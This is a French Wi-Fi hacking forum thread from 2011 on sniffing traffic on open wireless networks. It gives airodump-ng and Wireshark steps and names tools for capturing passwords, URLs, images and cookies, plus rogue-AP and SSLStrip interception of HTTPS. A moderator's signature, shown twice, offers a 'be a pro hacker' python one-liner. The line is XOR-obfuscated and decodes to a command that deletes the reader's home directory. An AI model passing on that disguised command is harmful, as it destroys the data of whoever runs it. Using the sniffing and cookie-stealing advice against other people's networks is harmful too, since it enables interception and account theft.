Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-10-2011 08:32:55

reallife
Membre Indétronable
Inscription : 26-09-2011
Messages : 181

Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Salut!

Bizarrement je n'ai pas trouvé de tuto sur ca sur votre site, mais après étude du WEP et WPA je vois pas pourquoi ca ne serait pas possible !

Donc ma question : peut-on sniffer passivement ce qui transiste sur un WLAN OPN ?

J'ai backtrack5R1 en machine virtuelle, et le seul truc qui s'affiche ce sont les beacons des AP, ca a un interet plutot... limité...

Merci!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-10-2011 12:01:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Oui, c'est bien sûr possible, c'est d'ailleurs un inconvénient des réseaux ouverts smile

Tu ne précises pas comment tu as essayé de faire, mais voilà ce que je te propose :
- créer une interface en mode monitor :

airmon-ng start wlan0

- lancer la capture avec airodump-ng et sauvegarder le résultat dans un fichier .cap

airodump-ng mon0 -c 6 -w capture
# Précise bien le canal du réseau ciblé, sinon tu vas louper des paquets !

- ouvrir le fichier capture-01.cap avec Wireshark pour voir le contenu des paquets.

Si tu veux faire du sniff en live, tu peux lancer directement une capture sur mon0 dans Wireshark, en OPN ça devrait passer wink

Hors Ligne

#3 01-10-2011 12:18:36

reallife
Membre Indétronable
Inscription : 26-09-2011
Messages : 181

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Hello,

Bon désolé bien avant ta réponse j'avais anticipé le principe de bloquer la carte sur un channel precis avec airodump et ecouter ensuite ce qui se passe avec wireshark smile
J'avais vu un post sur votre forum à propos de programmes permettant d'afficher a la volee tout ce qu'on sniffe justement sur des réseaux OPN!

Je crois avoir lu qu'ils permettaient de faire defiler les pages dans firefox pour des donnees sniffées http!
Quels sont les noms de ces logiciels, y a t-il d'autres application du meme type sur d'autres services ?
(Bien sur pas d'application MITM, j'en suis pas encore la smile)

Merci a tous!

Hors Ligne

#4 01-10-2011 12:20:41

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Oui, on peut. Wireshark te permet de le faire aisément, et airodump-ng (ou airodump-zc) doit le permettre.
On peut même sniffer ce qui transite sur du WPA à SSID masqué.

Mais pour lire les paquets, il faut connaître la clef (donc pour le OPN, c'est réglé.)
Il faut qu'il y ait des paquets par contre. Les beacons vont physiquement plus 'loin' que les paquets.
Mais avec une 1000mW tu ne devrais pas avoir trop de soucis.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 01-10-2011 12:30:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Ah, tu veux des programmes qui te sortent un contenu "visible" tout de suite, OK en voilà quelques-uns :
- Wireshark, avec le menu file >export > objects > http, tu as déjà quelques possibilités
- Xplico pour analyser une fichier de capture et te sortir tout le contenu "exploitable"
- urlsnarf, en écoute sur mon0, pour voir les URL visitées
- dsniff, pour les mots de passe "de base"
- driftnet pour voir toutes les images en transit sur le réseau
- webspy pour voir défiler dans une fenêtre firefox toutes les pages visitées

Note que les 4 derniers ne sont plus développés depuis longtemps, donc je ne garantis pas qu'ils fonctionneront correctement. En particulier, je n'ai jamais été convaincu par l'efficacité de webspy mais tu auras peut-être plus de chance que moi tongue

Tu peux jeter un oeil à Wifizoo (sur BT4, pas BT5) qui te permet d'extraire des données "texte" utiles, ainsi que les cookies (pour du cookie-stealing).

Hors Ligne

#6 01-10-2011 12:40:19

reallife
Membre Indétronable
Inscription : 26-09-2011
Messages : 181

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Ok merci beaucoup pour ces liens je vais tester tout ca !

Comment se fait-il que les utilitaires ne soient plus développés ? Il y a quand meme des possibilités énormes!
Je vais lire ceci : http://wiki.backtrack-fr.net/index.php/Dsniff attentivement smile

Par contre, j'ai une autre question :
- sur un réseau OPN, si le portail captif est en https, les données transiteront quand meme en clair, mais on pourra jamais récuperer les paires login/pass tout comme n'importe quel site en https c'est ca ?

Dernière modification par reallife (01-10-2011 12:47:49)

Hors Ligne

#7 01-10-2011 14:35:19

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Parce que le gars qui a écrit ces outils n'a plus le temps/l'envie/la possibilité de travailler dessus, tout simplement smile Les sources sont ouvertes, si tu veux reprendre le flambeau n'hésite pas ! tongue

Si tu mets en place un portail captif en HTTPS, tout le contenu sera chiffré et un sniffer ne pourra rien récupérer (pas de login/pass, donc). Par contre, si c'est ton RogueAP qui est en HTTPS, tu contrôles le point d'arrivée donc tu peux récupérer le contenu déchiffré (le SSL travaille de point à point). Attention que dans ce cas-là, tu seras obligé de proposer à ta victime un certificat SSL, et son navigateur va hurler s'il n'est pas proprement signé wink

Pour sniffer du contenu en HTTPS, il faut d'office être en MITM : le plus efficace (que je connaisse) est SSLStrip.

Hors Ligne

#8 18-10-2011 15:46:18

DeX57
Membre
Inscription : 22-11-2009
Messages : 19

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Donc si je comprend bien le truc, sur un réseau OPN il suffit de ciblé un réseau du genre sfr-hotspot-machintruc   avec airodump-ng et de lancer wireshark pour qu'il récup sur mon0   et les données sont récupérés ?!

Ca fait peur...

Hors Ligne

#9 18-10-2011 16:34:17

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Oui, un sniff passif (sur mon0) sur un réseau OPN suffit pour récupérer le trafic en clair. C'est un "problème" majeur autour des hotspots publics, mais aussi des réseaux privés maintenus en OPN par obligation (ou compatibilité).
Le trafic chiffré comme SSL (HTTPS,...), SSH ou VPN n'apparaît pas en clair et est plus difficile à récupérer (MITM,...).

Note que le trafic sur un réseau en WEP n'est pas beaucoup plus difficile à intercepter, la clé se casse "facilement" et le décodage en temps réel est possible (via airbase-ng). Le WPA par contre, avec ses clés de session propres à chaque machine, est beaucoup plus robuste (sans parler de la difficulté de casser la clé) wink

Hors Ligne

#10 05-11-2011 21:33:16

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Sniff de réseaux OPN sous linux avec alfa awus036 1000mW

Ca fait d'autant plus peur que je viens de voir que la plateforme de mail de free Zimbra n'utilise PAS LE HTTPS.
(je m'en suis rendu compte en trouvant mon adresse mail en clair dans une petite capture)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]